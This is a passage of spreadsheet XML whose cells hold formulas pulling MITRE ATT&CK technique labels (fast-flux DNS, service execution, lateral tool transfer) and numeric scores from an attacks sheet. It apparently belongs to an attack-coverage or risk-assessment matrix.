        <f>IF('(A) Ataques'!AK91&lt;&gt;"NO",IF('(A) Ataques'!M91="","",'(A) Ataques'!M91),"")</f>
        <v>T1568.001-FastFluxDNS</v>
      </c>
      <c r="D91" s="4" t="str">
        <f>IF('(A) Ataques'!AK91&lt;&gt;"NO",'(A) Ataques'!F91,"")</f>
        <v>T1568</v>
      </c>
      <c r="E91" s="286">
        <f>IF('(A) Ataques'!AK91&lt;&gt;"NO",'(A) Ataques'!AQ91,"")</f>
        <v>267</v>
      </c>
      <c r="F91" s="288">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!BB91,"")</f>
        <v>1</v>
      </c>
      <c r="G91" s="392">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!BD91,"")</f>
        <v>1</v>
      </c>
      <c r="H91" s="4">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!BF91,"")</f>
        <v>1</v>
      </c>
      <c r="I91" s="20">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!BG91,"")</f>
        <v>1</v>
      </c>
      <c r="J91" s="530">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",IF($F91=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K91" s="322">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$BH91,"")</f>
        <v>5</v>
      </c>
      <c r="L91" s="322">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$BJ91,"")</f>
        <v>1</v>
      </c>
      <c r="M91" s="4">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$BL91,"")</f>
        <v>1</v>
      </c>
      <c r="N91" s="20">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$BM91,"")</f>
        <v>1</v>
      </c>
      <c r="O91" s="532">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",IF($K91=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P91" s="292">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$BN91,"")</f>
        <v>6</v>
      </c>
      <c r="Q91" s="322">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$BP91,"")</f>
        <v>2</v>
      </c>
      <c r="R91" s="4">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$BR91,"")</f>
        <v>2</v>
      </c>
      <c r="S91" s="20">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$BS91,"")</f>
        <v>2</v>
      </c>
      <c r="T91" s="530">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",IF($P91=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U91" s="322">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$BT91,"")</f>
        <v>267</v>
      </c>
      <c r="V91" s="322">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$BV91,"")</f>
        <v>251</v>
      </c>
      <c r="W91" s="4">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$BX91,"")</f>
        <v>7</v>
      </c>
      <c r="X91" s="20">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$BY91,"")</f>
        <v>125</v>
      </c>
      <c r="Y91" s="532">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",IF($U91=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z91" s="288">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!BZ91,"")</f>
        <v>23</v>
      </c>
      <c r="AA91" s="392">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!CB91,"")</f>
        <v>9</v>
      </c>
      <c r="AB91" s="4">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!CD91,"")</f>
        <v>5</v>
      </c>
      <c r="AC91" s="20">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!CE91,"")</f>
        <v>3</v>
      </c>
      <c r="AD91" s="331">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",IF(Z91=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE91" s="322">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$CF91,"")</f>
        <v>290</v>
      </c>
      <c r="AF91" s="322">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$CH91,"")</f>
        <v>260</v>
      </c>
      <c r="AG91" s="4">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$CJ91,"")</f>
        <v>12</v>
      </c>
      <c r="AH91" s="20">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$CK91,"")</f>
        <v>127</v>
      </c>
      <c r="AI91" s="287">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",IF($AE91=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ91" s="292">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$CL91,"")</f>
        <v>0</v>
      </c>
      <c r="AK91" s="322">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$CN91,"")</f>
        <v>0</v>
      </c>
      <c r="AL91" s="4">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$CP91,"")</f>
        <v>0</v>
      </c>
      <c r="AM91" s="20">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$CQ91,"")</f>
        <v>0</v>
      </c>
      <c r="AN91" s="331">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",IF($AJ91=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO91" s="322">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$CR91,"")</f>
        <v>20</v>
      </c>
      <c r="AP91" s="322">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$CT91,"")</f>
        <v>4</v>
      </c>
      <c r="AQ91" s="4">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$CV91,"")</f>
        <v>4</v>
      </c>
      <c r="AR91" s="20">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!$CW91,"")</f>
        <v>1</v>
      </c>
      <c r="AS91" s="287">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",IF($AO91=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT91" s="288">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!CX91,"")</f>
        <v>26</v>
      </c>
      <c r="AU91" s="392">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!CZ91,"")</f>
        <v>6</v>
      </c>
      <c r="AV91" s="4">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!DB91,"")</f>
        <v>6</v>
      </c>
      <c r="AW91" s="20">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",'(A) Ataques'!DC91,"")</f>
        <v>2</v>
      </c>
      <c r="AX91" s="331">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",IF($AT91=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY91" s="469">
        <f>'(A) Ataques'!LU91+'(A) Ataques'!MA91+'(A) Ataques'!MG91+'(A) Ataques'!MM91+'(A) Ataques'!MS91</f>
        <v>0</v>
      </c>
      <c r="AZ91" s="510">
        <f>'(A) Ataques'!LW91+'(A) Ataques'!MC91+'(A) Ataques'!MI91+'(A) Ataques'!MO91+'(A) Ataques'!MU91</f>
        <v>0</v>
      </c>
      <c r="BA91" s="471">
        <f>'(A) Ataques'!LY91+'(A) Ataques'!ME91+'(A) Ataques'!MK91+'(A) Ataques'!MQ91+'(A) Ataques'!MW91</f>
        <v>0</v>
      </c>
      <c r="BB91" s="471">
        <f>'(A) Ataques'!LQ91</f>
        <v>0</v>
      </c>
      <c r="BC91" s="331">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",IF($AY91=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD91" s="469">
        <f>IF('(A) Ataques'!$AP91&lt;&gt;"NO",'(A) Ataques'!LL91,"")</f>
        <v>389</v>
      </c>
      <c r="BE91" s="510">
        <f>IF('(A) Ataques'!$AP91&lt;&gt;"NO",'(A) Ataques'!LM91,"")</f>
        <v>389</v>
      </c>
      <c r="BF91" s="471">
        <f>IF('(A) Ataques'!$AP91&lt;&gt;"NO",'(A) Ataques'!LN91,"")</f>
        <v>0</v>
      </c>
      <c r="BG91" s="471">
        <f>IF('(A) Ataques'!$AP91&lt;&gt;"NO",'(A) Ataques'!LO91,"")</f>
        <v>6</v>
      </c>
      <c r="BH91" s="471">
        <f>IF('(A) Ataques'!$AP91&lt;&gt;"NO",'(A) Ataques'!LS91,"")</f>
        <v>266</v>
      </c>
      <c r="BI91" s="331">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",IF($BD91=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ91" s="469">
        <f>'(A) Ataques'!OL91+'(A) Ataques'!OR91+'(A) Ataques'!OX91+'(A) Ataques'!PD91+'(A) Ataques'!PJ91</f>
        <v>20</v>
      </c>
      <c r="BK91" s="510">
        <f>'(A) Ataques'!ON91+'(A) Ataques'!OT91+'(A) Ataques'!OZ91+'(A) Ataques'!PF91+'(A) Ataques'!PL91</f>
        <v>20</v>
      </c>
      <c r="BL91" s="471">
        <f>'(A) Ataques'!OP91+'(A) Ataques'!OV91+'(A) Ataques'!PB91+'(A) Ataques'!PH91+'(A) Ataques'!PN91</f>
        <v>2</v>
      </c>
      <c r="BM91" s="495">
        <f>'(A) Ataques'!OH91</f>
        <v>20</v>
      </c>
      <c r="BN91" s="331">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",IF($BJ91=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO91" s="469">
        <f>IF('(A) Ataques'!$AP91&lt;&gt;"NO",'(A) Ataques'!OC91,"")</f>
        <v>20</v>
      </c>
      <c r="BP91" s="510">
        <f>IF('(A) Ataques'!$AP91&lt;&gt;"NO",'(A) Ataques'!OD91,"")</f>
        <v>20</v>
      </c>
      <c r="BQ91" s="471">
        <f>IF('(A) Ataques'!$AP91&lt;&gt;"NO",'(A) Ataques'!OE91,"")</f>
        <v>2</v>
      </c>
      <c r="BR91" s="471">
        <f>IF('(A) Ataques'!$AP91&lt;&gt;"NO",'(A) Ataques'!OF91,"")</f>
        <v>1</v>
      </c>
      <c r="BS91" s="471">
        <f>IF('(A) Ataques'!$AP91&lt;&gt;"NO",'(A) Ataques'!OJ91,"")</f>
        <v>20</v>
      </c>
      <c r="BT91" s="331">
        <f>IF('(A) Ataques'!$AK91&lt;&gt;"NO",IF($BO91=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="92" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A92" s="79">
        <f t="shared" si="1"/>
        <v>90</v>
      </c>
      <c r="B92" s="4">
        <f>IF('(A) Ataques'!AK92&lt;&gt;"NO",'(A) Ataques'!E92,"")</f>
        <v>60</v>
      </c>
      <c r="C92" s="6" t="str">
        <f>IF('(A) Ataques'!AK92&lt;&gt;"NO",IF('(A) Ataques'!M92="","",'(A) Ataques'!M92),"")</f>
        <v>T1569.002-System_services_service_execution</v>
      </c>
      <c r="D92" s="4" t="str">
        <f>IF('(A) Ataques'!AK92&lt;&gt;"NO",'(A) Ataques'!F92,"")</f>
        <v>T1569</v>
      </c>
      <c r="E92" s="286">
        <f>IF('(A) Ataques'!AK92&lt;&gt;"NO",'(A) Ataques'!AQ92,"")</f>
        <v>17</v>
      </c>
      <c r="F92" s="288">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!BB92,"")</f>
        <v>13</v>
      </c>
      <c r="G92" s="392">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!BD92,"")</f>
        <v>2</v>
      </c>
      <c r="H92" s="4">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!BF92,"")</f>
        <v>1</v>
      </c>
      <c r="I92" s="20">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!BG92,"")</f>
        <v>2</v>
      </c>
      <c r="J92" s="530">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",IF($F92=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K92" s="322">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$BH92,"")</f>
        <v>14</v>
      </c>
      <c r="L92" s="322">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$BJ92,"")</f>
        <v>4</v>
      </c>
      <c r="M92" s="4">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$BL92,"")</f>
        <v>4</v>
      </c>
      <c r="N92" s="20">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$BM92,"")</f>
        <v>2</v>
      </c>
      <c r="O92" s="532">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",IF($K92=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P92" s="292">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$BN92,"")</f>
        <v>27</v>
      </c>
      <c r="Q92" s="322">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$BP92,"")</f>
        <v>6</v>
      </c>
      <c r="R92" s="4">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$BR92,"")</f>
        <v>5</v>
      </c>
      <c r="S92" s="20">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$BS92,"")</f>
        <v>3</v>
      </c>
      <c r="T92" s="530">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",IF($P92=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U92" s="322">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$BT92,"")</f>
        <v>23</v>
      </c>
      <c r="V92" s="322">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$BV92,"")</f>
        <v>7</v>
      </c>
      <c r="W92" s="4">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$BX92,"")</f>
        <v>6</v>
      </c>
      <c r="X92" s="20">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$BY92,"")</f>
        <v>4</v>
      </c>
      <c r="Y92" s="532">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",IF($U92=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z92" s="288">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!BZ92,"")</f>
        <v>40</v>
      </c>
      <c r="AA92" s="392">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!CB92,"")</f>
        <v>30</v>
      </c>
      <c r="AB92" s="4">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!CD92,"")</f>
        <v>28</v>
      </c>
      <c r="AC92" s="20">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!CE92,"")</f>
        <v>5</v>
      </c>
      <c r="AD92" s="331">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",IF(Z92=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE92" s="322">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$CF92,"")</f>
        <v>63</v>
      </c>
      <c r="AF92" s="322">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$CH92,"")</f>
        <v>37</v>
      </c>
      <c r="AG92" s="4">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$CJ92,"")</f>
        <v>34</v>
      </c>
      <c r="AH92" s="20">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$CK92,"")</f>
        <v>6</v>
      </c>
      <c r="AI92" s="287">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",IF($AE92=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ92" s="292">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$CL92,"")</f>
        <v>0</v>
      </c>
      <c r="AK92" s="322">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$CN92,"")</f>
        <v>0</v>
      </c>
      <c r="AL92" s="4">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$CP92,"")</f>
        <v>0</v>
      </c>
      <c r="AM92" s="20">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$CQ92,"")</f>
        <v>0</v>
      </c>
      <c r="AN92" s="331">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",IF($AJ92=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO92" s="322">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$CR92,"")</f>
        <v>2</v>
      </c>
      <c r="AP92" s="322">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$CT92,"")</f>
        <v>2</v>
      </c>
      <c r="AQ92" s="4">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$CV92,"")</f>
        <v>2</v>
      </c>
      <c r="AR92" s="20">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!$CW92,"")</f>
        <v>2</v>
      </c>
      <c r="AS92" s="287">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",IF($AO92=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT92" s="288">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!CX92,"")</f>
        <v>29</v>
      </c>
      <c r="AU92" s="392">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!CZ92,"")</f>
        <v>8</v>
      </c>
      <c r="AV92" s="4">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!DB92,"")</f>
        <v>7</v>
      </c>
      <c r="AW92" s="20">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",'(A) Ataques'!DC92,"")</f>
        <v>5</v>
      </c>
      <c r="AX92" s="331">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",IF($AT92=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY92" s="469">
        <f>'(A) Ataques'!LU92+'(A) Ataques'!MA92+'(A) Ataques'!MG92+'(A) Ataques'!MM92+'(A) Ataques'!MS92</f>
        <v>0</v>
      </c>
      <c r="AZ92" s="510">
        <f>'(A) Ataques'!LW92+'(A) Ataques'!MC92+'(A) Ataques'!MI92+'(A) Ataques'!MO92+'(A) Ataques'!MU92</f>
        <v>0</v>
      </c>
      <c r="BA92" s="471">
        <f>'(A) Ataques'!LY92+'(A) Ataques'!ME92+'(A) Ataques'!MK92+'(A) Ataques'!MQ92+'(A) Ataques'!MW92</f>
        <v>0</v>
      </c>
      <c r="BB92" s="471">
        <f>'(A) Ataques'!LQ92</f>
        <v>0</v>
      </c>
      <c r="BC92" s="331">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",IF($AY92=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD92" s="469">
        <f>IF('(A) Ataques'!$AP92&lt;&gt;"NO",'(A) Ataques'!LL92,"")</f>
        <v>15</v>
      </c>
      <c r="BE92" s="510">
        <f>IF('(A) Ataques'!$AP92&lt;&gt;"NO",'(A) Ataques'!LM92,"")</f>
        <v>14</v>
      </c>
      <c r="BF92" s="471">
        <f>IF('(A) Ataques'!$AP92&lt;&gt;"NO",'(A) Ataques'!LN92,"")</f>
        <v>0</v>
      </c>
      <c r="BG92" s="471">
        <f>IF('(A) Ataques'!$AP92&lt;&gt;"NO",'(A) Ataques'!LO92,"")</f>
        <v>9</v>
      </c>
      <c r="BH92" s="471">
        <f>IF('(A) Ataques'!$AP92&lt;&gt;"NO",'(A) Ataques'!LS92,"")</f>
        <v>10</v>
      </c>
      <c r="BI92" s="331">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",IF($BD92=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ92" s="469">
        <f>'(A) Ataques'!OL92+'(A) Ataques'!OR92+'(A) Ataques'!OX92+'(A) Ataques'!PD92+'(A) Ataques'!PJ92</f>
        <v>2</v>
      </c>
      <c r="BK92" s="510">
        <f>'(A) Ataques'!ON92+'(A) Ataques'!OT92+'(A) Ataques'!OZ92+'(A) Ataques'!PF92+'(A) Ataques'!PL92</f>
        <v>2</v>
      </c>
      <c r="BL92" s="471">
        <f>'(A) Ataques'!OP92+'(A) Ataques'!OV92+'(A) Ataques'!PB92+'(A) Ataques'!PH92+'(A) Ataques'!PN92</f>
        <v>2</v>
      </c>
      <c r="BM92" s="495">
        <f>'(A) Ataques'!OH92</f>
        <v>1</v>
      </c>
      <c r="BN92" s="331">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",IF($BJ92=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO92" s="469">
        <f>IF('(A) Ataques'!$AP92&lt;&gt;"NO",'(A) Ataques'!OC92,"")</f>
        <v>2</v>
      </c>
      <c r="BP92" s="510">
        <f>IF('(A) Ataques'!$AP92&lt;&gt;"NO",'(A) Ataques'!OD92,"")</f>
        <v>2</v>
      </c>
      <c r="BQ92" s="471">
        <f>IF('(A) Ataques'!$AP92&lt;&gt;"NO",'(A) Ataques'!OE92,"")</f>
        <v>2</v>
      </c>
      <c r="BR92" s="471">
        <f>IF('(A) Ataques'!$AP92&lt;&gt;"NO",'(A) Ataques'!OF92,"")</f>
        <v>2</v>
      </c>
      <c r="BS92" s="471">
        <f>IF('(A) Ataques'!$AP92&lt;&gt;"NO",'(A) Ataques'!OJ92,"")</f>
        <v>1</v>
      </c>
      <c r="BT92" s="331">
        <f>IF('(A) Ataques'!$AK92&lt;&gt;"NO",IF($BO92=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="93" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A93" s="79">
        <f t="shared" si="1"/>
        <v>91</v>
      </c>
      <c r="B93" s="4">
        <f>IF('(A) Ataques'!AK93&lt;&gt;"NO",'(A) Ataques'!E93,"")</f>
        <v>61</v>
      </c>
      <c r="C93" s="6" t="str">
        <f>IF('(A) Ataques'!AK93&lt;&gt;"NO",IF('(A) Ataques'!M93="","",'(A) Ataques'!M93),"")</f>
        <v>T1570-Lateral_Tool_Transfer</v>
      </c>
      <c r="D93" s="4" t="str">
        <f>IF('(A) Ataques'!AK93&lt;&gt;"NO",'(A) Ataques'!F93,"")</f>
        <v>T1570</v>
      </c>
      <c r="E93" s="286">
        <f>IF('(A) Ataques'!AK93&lt;&gt;"NO",'(A) Ataques'!AQ93,"")</f>
        <v>7</v>
      </c>
      <c r="F93" s="288">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!BB93,"")</f>
        <v>7</v>
      </c>
      <c r="G93" s="392">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!BD93,"")</f>
        <v>2</v>
      </c>
      <c r="H93" s="4">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!BF93,"")</f>
        <v>1</v>
      </c>
      <c r="I93" s="20">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!BG93,"")</f>
        <v>2</v>
      </c>
      <c r="J93" s="530">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",IF($F93=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K93" s="322">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$BH93,"")</f>
        <v>3</v>
      </c>
      <c r="L93" s="322">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$BJ93,"")</f>
        <v>2</v>
      </c>
      <c r="M93" s="4">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$BL93,"")</f>
        <v>1</v>
      </c>
      <c r="N93" s="20">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$BM93,"")</f>
        <v>2</v>
      </c>
      <c r="O93" s="532">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",IF($K93=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P93" s="292">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$BN93,"")</f>
        <v>10</v>
      </c>
      <c r="Q93" s="322">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$BP93,"")</f>
        <v>4</v>
      </c>
      <c r="R93" s="4">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$BR93,"")</f>
        <v>2</v>
      </c>
      <c r="S93" s="20">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$BS93,"")</f>
        <v>2</v>
      </c>
      <c r="T93" s="530">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",IF($P93=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U93" s="322">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$BT93,"")</f>
        <v>7</v>
      </c>
      <c r="V93" s="322">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$BV93,"")</f>
        <v>2</v>
      </c>
      <c r="W93" s="4">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$BX93,"")</f>
        <v>1</v>
      </c>
      <c r="X93" s="20">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$BY93,"")</f>
        <v>2</v>
      </c>
      <c r="Y93" s="532">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",IF($U93=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z93" s="288">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!BZ93,"")</f>
        <v>32</v>
      </c>
      <c r="AA93" s="392">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!CB93,"")</f>
        <v>21</v>
      </c>
      <c r="AB93" s="4">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!CD93,"")</f>
        <v>18</v>
      </c>
      <c r="AC93" s="20">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!CE93,"")</f>
        <v>2</v>
      </c>
      <c r="AD93" s="331">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",IF(Z93=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE93" s="322">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$CF93,"")</f>
        <v>39</v>
      </c>
      <c r="AF93" s="322">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$CH93,"")</f>
        <v>23</v>
      </c>
      <c r="AG93" s="4">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$CJ93,"")</f>
        <v>19</v>
      </c>
      <c r="AH93" s="20">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$CK93,"")</f>
        <v>2</v>
      </c>
      <c r="AI93" s="287">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",IF($AE93=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ93" s="292">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$CL93,"")</f>
        <v>0</v>
      </c>
      <c r="AK93" s="322">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$CN93,"")</f>
        <v>0</v>
      </c>
      <c r="AL93" s="4">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$CP93,"")</f>
        <v>0</v>
      </c>
      <c r="AM93" s="20">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$CQ93,"")</f>
        <v>0</v>
      </c>
      <c r="AN93" s="331">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",IF($AJ93=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO93" s="322">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$CR93,"")</f>
        <v>0</v>
      </c>
      <c r="AP93" s="322">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$CT93,"")</f>
